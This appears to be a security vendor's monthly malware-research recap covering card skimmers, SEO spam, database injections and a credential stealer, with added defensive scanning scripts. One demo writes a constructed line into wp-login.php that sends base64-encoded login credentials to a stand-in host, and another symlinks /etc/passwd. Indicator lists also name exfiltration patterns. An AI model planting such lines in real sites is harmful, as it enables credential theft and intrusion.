Time for another monthly recap! If you haven’t seen the other monthly recaps, make sure to check out October and September. Our malware research and incident response teams publish technical content in the Sucuri Labs Notes. The knowledge and recommendations are useful to keep your website and visitors safe.
This month we saw a large variety of cases being analyzed by our team, including some interesting SEO spam techniques, malware-injected databases, and conditional malware targeting specific mobile platforms.
Credit card skimmers are the primary issue that we have been writing about, especially with the holidays getting closer. More online shopping means more chances for the bad guys to have access to credit card information.
Geolocation and Credit Card Data Stolen from Magento
by Krasimir Konov
Normally we see credit card details being stolen and emailed to attackers, or stored in a text file on the server. We have raised awareness about these types of ecommerce hacks in the past. Here we are seeing geo-location information (IP Address, Country, Region, City) added as a malicious variable, $datasend, along with sensitive credit card info.
Magento hackers are specifically using the mail() function on compromised servers. An integrity monitoring service can easily detect the file modifications and allow for quick recovery of hacked Magento sites.
Spam SEO Injector Circumventing Defense Techniques
by Luke Leal
Here we analyze a hack that adds a rewrite rule to the .htaccess file, which causes an SEO spam payload to be delivered to certain visitors who request HTML files in a specific directory.
By checking the request headers for IP addresses, HTTP referrers, and the HTTP user agent, the spammers can send the spam only to visitors coming from search engines. If the prerequisites aren’t met, the spammers send the visitors to their affiliate link instead of the SEO spam content.
These attackers included a function which prevents many security plugins and extensions from mitigating the attack. If the security tool uses the file extension .suspected to quarantine suspicious files, the malware will change the file back to a PHP extension.
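The conditional delivery described above is visible in the .htaccess itself: a RewriteRule gated on RewriteCond lines that test the visitor's user agent, referrer or address. The following audit script is an added example (not Sucuri's code) that reports every such gated rule; the .htaccess text it scans is a constructed sample, not a real infection.

```python
"""Audit an .htaccess file for conditional SEO-spam rewrite rules.

Added example, not Sucuri's code.  It flags every RewriteRule whose
preceding RewriteCond lines test the visitor's user agent, referrer or
IP address, which is the conditional delivery described in the note.
The .htaccess text below is a constructed sample, not a real infection.
"""
import re

SAMPLE_HTACCESS = """\
# constructed sample
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot|yandex) [NC]
RewriteCond %{HTTP_REFERER} ^https?://(www\\.)?(google|bing)\\. [NC]
RewriteRule ^blog/.*\\.html$ /wp-content/uploads/cache/seo.php [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ /index.php?q=$1 [L]
"""

# Server variables that describe the visitor rather than the requested path.
VISITOR_VARS = {"HTTP_USER_AGENT", "HTTP_REFERER", "REMOTE_ADDR",
                "REMOTE_HOST", "HTTP_X_FORWARDED_FOR"}

COND_RE = re.compile(r"RewriteCond\s+%\{(\w+)\}\s+(\S+)", re.I)
RULE_RE = re.compile(r"RewriteRule\s+(\S+)\s+(\S+)", re.I)


def audit_htaccess(text):
    """Return findings as (line_no, pattern, target, [(var, regex), ...]).

    Only rules gated on visitor-describing variables are reported.  A
    RewriteCond applies to the next RewriteRule only, so the pending
    list is reset after every rule.
    """
    findings = []
    pending = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        cond = COND_RE.match(line)
        if cond:
            pending.append((cond.group(1).upper(), cond.group(2)))
            continue
        rule = RULE_RE.match(line)
        if rule:
            gated = [c for c in pending if c[0] in VISITOR_VARS]
            if gated:
                findings.append((no, rule.group(1), rule.group(2), gated))
            pending = []
    return findings


if __name__ == "__main__":
    for no, pattern, target, conds in audit_htaccess(SAMPLE_HTACCESS):
        print(f"line {no}: {pattern} -> {target}")
        for var, regex in conds:
            print(f"    gated on {var} {regex}")
```

Run it against every .htaccess under the web root; a rule that sends `.html` requests to a `.php` file only when the visitor looks like a crawler is exactly the pattern the note describes, while the ordinary front-controller rule at the end of the sample is not reported because it tests the request path, not the visitor.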
Malware DB Injection Called via Theme File
by Krasimir Konov
Most often we find SEO spam hidden and generated within the file structure. In this post, we analyze a well-hidden database injection inside the themes_config option of a WordPress database. The malware is called from the database using the get_option() function inside of a theme file. From there, the script injected into the database checks the referral headers for specific user agents, and only those visitors receive the spam content.
Using a good website firewall can help prevent this kind of database injection from happening in the first place.
The Tale of a Malicious Stored Procedure
by Douglas Santos
Most database injections are related to spam, but in this case our analysts found a stored procedure in the database. When executed, it writes a PHP uploader into WordPress using the fake filename wp-includes/class-wp-change.php.
If anyone attempts to remove the file, the stored procedure in the DB regenerates the file. This allows the attackers to retain access to the site and continue their malware campaign. We are seeing a lot of self-replicating malware like this, which makes it difficult for admins to clean their infected sites.
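Both the themes_config injection and the stored procedure live in the database as text rows, so a single scanner can look for them. The script below is an added example (not Sucuri's code) that checks option values for PHP meant to be executed and routine definitions for file writes; the rows are constructed samples and the indicator lists are an assumed starting point, not a complete signature set.

```python
"""Scan WordPress option values and MySQL routine bodies for injected code.

Added example, not Sucuri's code.  Covers two cases from the notes: a
PHP payload stored in an option (loaded via get_option() and eval'd by
a theme file) and a stored procedure that rewrites a PHP uploader when
it is deleted.  Rows below are constructed; indicator lists are assumed.
"""
import re

# Markers of PHP meant to be executed from an option value.
OPTION_INDICATORS = [
    r"<\?php", r"\beval\s*\(", r"base64_decode\s*\(", r"gzinflate\s*\(",
    r"str_rot13\s*\(", r"\bassert\s*\(", r"create_function\s*\(",
]
# Markers of a routine that writes to the filesystem or carries PHP.
ROUTINE_INDICATORS = [
    r"INTO\s+(?:OUT|DUMP)FILE", r"\bLOAD_FILE\s*\(", r"<\?php", r"\.php\b",
]


def _hits(text, patterns):
    """Return the patterns that match, in list order (empty if clean)."""
    return [p for p in patterns if re.search(p, text, re.I | re.S)]


def _flag(rows, patterns):
    flagged = []
    for name, text in rows:
        hits = _hits(text, patterns)
        if hits:
            flagged.append((name, hits))
    return flagged


def scan_options(rows):
    """rows: (option_name, option_value) pairs, e.g. from
    SELECT option_name, option_value FROM wp_options."""
    return _flag(rows, OPTION_INDICATORS)


def scan_routines(rows):
    """rows: (ROUTINE_NAME, ROUTINE_DEFINITION) pairs, e.g. from
    SELECT ROUTINE_NAME, ROUTINE_DEFINITION FROM information_schema.ROUTINES."""
    return _flag(rows, ROUTINE_INDICATORS)


# Constructed sample rows; the serialized option mimics a theme setting.
SAMPLE_OPTIONS = [
    ("siteurl", "https://example.test"),
    ("themes_config",
     'a:1:{s:4:"code";s:40:"eval(base64_decode(\'ZWNobyAiaGkiOw==\'));";}'),
    ("blogdescription", "Just another site"),
]
SAMPLE_ROUTINES = [
    ("cleanup_transients",
     "BEGIN DELETE FROM wp_options WHERE option_name LIKE '_transient_%'; END"),
    ("wp_change",
     "BEGIN SELECT '<?php /* uploader body elided in this sample */ ?>' "
     "INTO OUTFILE '/var/www/html/wp-includes/class-wp-change.php'; END"),
]


if __name__ == "__main__":
    for name, hits in scan_options(SAMPLE_OPTIONS):
        print(f"option {name}: {hits}")
    for name, hits in scan_routines(SAMPLE_ROUTINES):
        print(f"routine {name}: {hits}")
```

Feed it the output of the two SELECTs named in the docstrings. A routine hit on `INTO OUTFILE` pointing into the web root explains a file that keeps coming back after deletion, which is the behaviour described above, and the fix is to drop the routine before cleaning the file.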
Malware Targets Mobile Platforms
by Cesar Anjos
Spammers use conditional malware that detects the type of device that users are browsing on in order to deliver mobile-specific malvertising and web spam. We look at a malware injection inside a WordPress header.php file that redirects users to malicious mobile downloads and pop-up spam.
Our free online scanner SiteCheck runs several scans to emulate different user agents. This allows you to detect problems on your site that may only be visible to visitors coming from certain countries, browsers, referrers, and devices.
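The same idea, fetching one page as several different clients and comparing what comes back, can be scripted for a site you administer. The following is an added example (not SiteCheck's code): the user-agent strings are an assumed sample set, and the `fetch` function is injectable so the comparison logic can be exercised offline.

```python
"""Fetch one URL as several clients and report variants that differ.

Added example, not SiteCheck's code.  Conditional malware only renders
for some devices, referrers or crawlers, so the check requests the same
page with several User-Agent values (and an optional Referer), hashes
each body and lists script hosts that appear only in non-desktop
variants.  The user-agent strings are an assumed sample set.
"""
import hashlib
import re
import urllib.request

USER_AGENTS = {
    "desktop": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0 Safari/537.36",
    "android": "Mozilla/5.0 (Linux; Android 13; Pixel 7) AppleWebKit/537.36 Chrome/120.0 Mobile Safari/537.36",
    "iphone": "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 Mobile/15E148 Safari/604.1",
    "googlebot": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
}

SCRIPT_SRC_RE = re.compile(rb"<script[^>]*\ssrc=[\"']?(?:https?:)?//([^/\"'>\s]+)", re.I)


def default_fetch(url, headers):
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read()


def script_hosts(body):
    """Hosts of external <script src> tags in the response body."""
    return sorted({h.decode("ascii", "replace").lower()
                   for h in SCRIPT_SRC_RE.findall(body)})


def compare_variants(url, fetch=default_fetch, referer=None, agents=USER_AGENTS):
    """Return {variant: {"sha256", "script_hosts", "differs", "new_script_hosts"}}
    relative to the "desktop" variant, which must be present in agents."""
    raw = {}
    for name, ua in agents.items():
        headers = {"User-Agent": ua}
        if referer:
            headers["Referer"] = referer
        body = fetch(url, headers)
        raw[name] = (hashlib.sha256(body).hexdigest(), script_hosts(body))
    base_hash, base_hosts = raw["desktop"]
    report = {}
    for name, (digest, hosts) in raw.items():
        report[name] = {
            "sha256": digest,
            "script_hosts": hosts,
            "differs": digest != base_hash,
            "new_script_hosts": [h for h in hosts if h not in base_hosts],
        }
    return report


def suspicious_variants(report):
    """Variants whose body differs from the desktop baseline."""
    return sorted(name for name, info in report.items() if info["differs"])


if __name__ == "__main__":
    import sys
    for name, info in compare_variants(sys.argv[1]).items():
        flag = "DIFFERS" if info["differs"] else "same"
        print(f"{name:10s} {flag:8s} new script hosts: {info['new_script_hosts']}")
```

On sites that embed per-request nonces or timestamps every variant will differ by hash, so the list of script hosts that only the mobile or crawler variants load is the more useful signal; a pop-up or download host that the desktop response never references is what to investigate.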
Multiple UNIX Users Symbolic Link Injector
by Yuliyan Tsvetkov
This malware first confirms that the server runs Linux with the symlink() function enabled in the PHP engine, then injects symbolic links into every home folder. We are seeing this campaign being used for defacements via a .htaccess redirect.
On a shared server, this infection can quickly spread to all sites on the server through these symlinks.
The infection avoids detection and blacklisting by search engines, because it redirects requests from those user agents to a 404 page.
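On a shared host the defensive check is a periodic audit of every home directory for symlinks that resolve outside the home they sit in. The script below is an added example (not Sucuri's code); `homes_root` defaults to /home, and `build_demo_tree()` creates a throwaway tree so it can be run without touching a real server.

```python
"""Find symbolic links inside home directories that point outside them.

Added example, not Sucuri's code.  The injector described in the note
drops symlinks into every home folder so that one compromised account
can reach the other sites on the host; an audit like this lists them.
build_demo_tree() builds a constructed layout for a dry run.
"""
import os
import tempfile


def audit_symlinks(homes_root="/home"):
    """Return sorted (link_path, raw_target) for links escaping their home.

    os.walk does not follow symlinked directories, so a link into another
    user's home is reported once and never descended into.
    """
    findings = []
    for user in os.listdir(homes_root):
        home = os.path.join(homes_root, user)
        if os.path.islink(home) or not os.path.isdir(home):
            continue
        home_real = os.path.realpath(home)
        for dirpath, dirnames, filenames in os.walk(home):
            for name in dirnames + filenames:
                path = os.path.join(dirpath, name)
                if not os.path.islink(path):
                    continue
                target = os.path.realpath(path)
                if os.path.commonpath([target, home_real]) != home_real:
                    findings.append((path, os.readlink(path)))
    return sorted(findings)


def build_demo_tree():
    """Constructed layout: two homes, one benign link and two escaping links."""
    root = tempfile.mkdtemp(prefix="homes-")
    alice = os.path.join(root, "alice")
    bob = os.path.join(root, "bob")
    os.makedirs(os.path.join(alice, "public_html"))
    os.makedirs(os.path.join(bob, "public_html"))
    os.makedirs(os.path.join(bob, "docs"))
    with open(os.path.join(alice, "public_html", "wp-config.php"), "w") as fh:
        fh.write("<?php // constructed placeholder\n")
    # benign: stays inside bob's own home
    os.symlink(os.path.join(bob, "docs"), os.path.join(bob, "shared"))
    # escaping: reaches into alice's site and into the system
    os.symlink("../../alice/public_html/wp-config.php",
               os.path.join(bob, "public_html", "cfg.txt"))
    os.symlink("/etc/passwd", os.path.join(bob, "public_html", "pw.txt"))
    return root


if __name__ == "__main__":
    root = build_demo_tree()
    for link, target in audit_symlinks(root):
        print(f"{link} -> {target}")
```

Run from cron as root so every home is readable; links that escape their home are the spread mechanism the note describes, and removing them (plus the `.htaccess` redirect they serve) is the clean-up step, after which `disable_functions` in php.ini can be used to turn off `symlink` for the PHP engine if no site needs it.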
Malicious Routine Stealing WordPress Credentials in the Wild
by Douglas Santos
We have covered a few incidents where attackers steal login credentials to a website and either email them to themselves, or store the credentials in a file on the server.
This time, we look at a piece of malware that sends the compromised login and password to an external site controlled by the attacker. Rather than using the mail() function or creating a curl request, the attackers injected a single line of malware inside the wp-login.php file that uses file_get_contents() to post the username and password, encoded in base64, to the remote website. A single line like this is easy to overlook.
Unwanted Sex Toys Advertisement
by Eugene Wozniak
This incident affected an HTML-based website. Normally we write about malware affecting a particular CMS, but in this case it is a static site suffering from the infection. It’s important to note that these sites are also targets of attacks.
The website was showing unwanted floating banners advertising sex toys. The malware itself used JS Packer compression to obfuscate the payload, and could be injected into several HTML pages on the website.
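"JS Packer" refers to the Dean Edwards p,a,c,k,e,d format, which wraps the real script in `eval(function(p,a,c,k,e,d){...}('payload',base,count,'words'.split('|'),0,{}))`: identifiers in the payload are replaced by base-N tokens and the word list restores them. Reversing that substitution statically, without evaluating anything, lets an analyst read an injected banner script safely. The unpacker below is an added example (not Sucuri's code) and the packed sample is constructed.

```python
"""Statically unpack Dean Edwards-style "p,a,c,k,e,d" JavaScript.

Added example, not Sucuri's code.  The packer runtime decodes each token
with e(c) (base-N digits 0-9, a-z, A-Z) and replaces it, in descending
order, with words[c].  This mirrors that loop without eval.
"""
import re

ARGS_RE = re.compile(
    r"\}\s*\(\s*'(?P<payload>.*)'\s*,\s*(?P<base>\d+)\s*,\s*(?P<count>\d+)\s*,"
    r"\s*'(?P<words>.*?)'\s*\.split\(\s*'\|'\s*\)",
    re.S,
)
_ESCAPES = {"n": "\n", "r": "\r", "t": "\t"}


def _unescape(js_literal):
    """Undo one level of JS single-quoted string escaping."""
    return re.sub(r"\\(.)", lambda m: _ESCAPES.get(m.group(1), m.group(1)),
                  js_literal, flags=re.S)


def encode(c, base):
    """Mirror of the packer's e(c): digits 0-9, then a-z, then A-Z."""
    def digit(d):
        if d < 10:
            return str(d)
        if d < 36:
            return chr(ord("a") + d - 10)
        return chr(ord("A") + d - 36)
    out = ""
    while True:
        out = digit(c % base) + out
        c //= base
        if c == 0:
            return out


def unpack(packed):
    """Return the original script for a p,a,c,k,e,d string; raises on other input."""
    m = ARGS_RE.search(packed)
    if not m:
        raise ValueError("not a p,a,c,k,e,d payload")
    payload = _unescape(m.group("payload"))
    base, count = int(m.group("base")), int(m.group("count"))
    words = _unescape(m.group("words")).split("|")
    # Substitute in descending order, as the packer does, so a multi-digit
    # token is never corrupted by an earlier single-digit replacement.
    for c in range(count - 1, -1, -1):
        if c < len(words) and words[c]:
            token = re.compile(r"\b" + re.escape(encode(c, base)) + r"\b")
            payload = token.sub(lambda _m, w=words[c]: w, payload)
    return payload


# Constructed sample; the packer runtime body is elided since only the
# trailing argument list matters for unpacking.
SAMPLE_PACKED = (
    "eval(function(p,a,c,k,e,d){/* packer runtime elided in this sample */}"
    "('0.1(\\'2 3\\')',62,4,'document|write|hello|world'.split('|'),0,{}))"
)


if __name__ == "__main__":
    print(unpack(SAMPLE_PACKED))
```

Real samples are often packed more than once, so call `unpack()` repeatedly while the result still matches `ARGS_RE`; the unpacked text is then ordinary JavaScript whose injected hosts and DOM insertions can be read directly.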
New Version of Magento Credit Card Stealer in the Wild
by Cesar Anjos
Credit card stealers continue to evolve and put ecommerce sites at risk. This new variant of malware intercepts credit card data being sent to PayPal by the Magento file app/code/core/Mage/Paypal/Model/Direct.php.
We recognized the gmail account as the same attacker who has received stolen credentials in the past.
Another variant uses the file app/code/core/Mage/Checkout/Model/Type/Onepage.php to intercept data using the OnePage checkout module.
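The wp-login.php credential stealer, the two Magento skimmers and the geolocation skimmer above share a trait: each is a small edit to a file that should never change between upgrades. A stored hash baseline catches the edit and a few content patterns explain why it matters. The script below is an added example (not Sucuri's monitoring service); the watchlist is an assumed set built from the paths the notes name, and the demo tree and injected line are constructed.

```python
"""Hash baseline plus content heuristics for high-value PHP files.

Added example, not Sucuri's monitoring service.  build_baseline() is run
after a clean install or upgrade; check() is run on a schedule and
reports files that changed or disappeared, with indicator names for
patterns that suggest outbound transfer of request data.
"""
import hashlib
import os
import re
import tempfile

# Assumed watchlist built from the files named in the notes.
WATCHLIST = [
    "wp-login.php",
    "app/code/core/Mage/Paypal/Model/Direct.php",
    "app/code/core/Mage/Checkout/Model/Type/Onepage.php",
]

# Assumed indicator set, not a complete signature list.
INDICATORS = {
    "http-get exfil": r"file_get_contents\s*\(\s*['\"]https?://",
    "curl exfil": r"curl_(?:init|setopt)\s*\(.*https?://",
    "mail() exfil": r"\bmail\s*\(",
    "encoded POST data": r"base64_encode\s*\([^)]*\$_(?:POST|REQUEST)",
}


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root, watchlist=WATCHLIST):
    """Hash every watched file that exists under root."""
    return {rel: sha256_file(os.path.join(root, rel))
            for rel in watchlist if os.path.isfile(os.path.join(root, rel))}


def check(root, baseline):
    """Compare the tree to the baseline; return findings sorted by path."""
    findings = []
    for rel, known in baseline.items():
        path = os.path.join(root, rel)
        if not os.path.isfile(path):
            findings.append({"file": rel, "status": "missing", "indicators": []})
            continue
        if sha256_file(path) == known:
            continue
        with open(path, "r", errors="replace") as fh:
            body = fh.read()
        hits = [name for name, pat in INDICATORS.items() if re.search(pat, body)]
        findings.append({"file": rel, "status": "modified", "indicators": hits})
    return sorted(findings, key=lambda f: f["file"])


def run_demo():
    """Constructed tree: baseline two clean stand-ins, then append one line."""
    root = tempfile.mkdtemp(prefix="site-")
    for rel in WATCHLIST[:2]:
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), "w") as fh:
            fh.write("<?php\n// constructed stand-in for the real file\n")
    baseline = build_baseline(root)
    with open(os.path.join(root, "wp-login.php"), "a") as fh:
        # constructed sample of the one-line edit described in the note
        fh.write("@file_get_contents('http://exfil.invalid/?d='"
                 ".base64_encode($_POST['log'].':'.$_POST['pwd']));\n")
    return check(root, baseline)


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

Keep the baseline outside the web root (or signed) so the same write access that modifies wp-login.php cannot also update the stored hashes, and re-run `build_baseline()` only as part of a verified upgrade.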